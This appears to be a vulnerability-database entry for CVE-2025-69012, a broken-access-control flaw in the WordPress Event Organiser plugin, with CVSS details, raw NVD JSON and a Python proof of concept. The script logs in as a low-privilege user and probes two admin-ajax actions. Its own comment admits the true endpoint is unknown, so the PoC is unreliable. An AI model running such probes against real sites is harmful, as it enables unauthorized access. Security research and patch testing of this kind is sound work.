Security Vulnerability Report
中文
CVE-2025-69012 CVSS 4.3 MEDIUM

CVE-2025-69012

Published: 2025-12-30 11:15:59
Last Modified: 2026-04-27 20:16:25

Description

Missing Authorization vulnerability in Stephen Harris Event Organiser event-organiser allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Event Organiser: from n/a through <= 3.12.8.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Event Organiser <= 3.12.8(所有受影响的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69012 PoC - WordPress Event Organiser Broken Access Control # Target: WordPress site with Event Organiser plugin <= 3.12.8 # Authenticated low-privilege user (subscriber role) import requests import sys TARGET_URL = "https://vulnerable-site.com" USERNAME = "low_priv_user" PASSWORD = "password123" def exploit(): # Step 1: Authenticate with low-privilege account session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Step 2: Access admin-only functionality via plugin endpoint # This exploits the missing authorization check exploit_urls = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=eo_manage_events", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=eo_organiser_ajax", ] for url in exploit_urls: response = session.get(url) if response.status_code == 200: print(f"[+] Potentially vulnerable endpoint: {url}") print(f"[+] Response: {response.text[:500]}") if __name__ == "__main__": exploit() # Note: Actual PoC requires identifying specific vulnerable endpoint # Refer to Patchstack advisory for complete exploitation details

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69012", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:59.410", "lastModified": "2026-04-27T20:16:24.623", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Stephen Harris Event Organiser event-organiser allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Event Organiser: from n/a through <= 3.12.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/event-organiser/vulnerability/wordpress-event-organiser-plugin-3-12-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}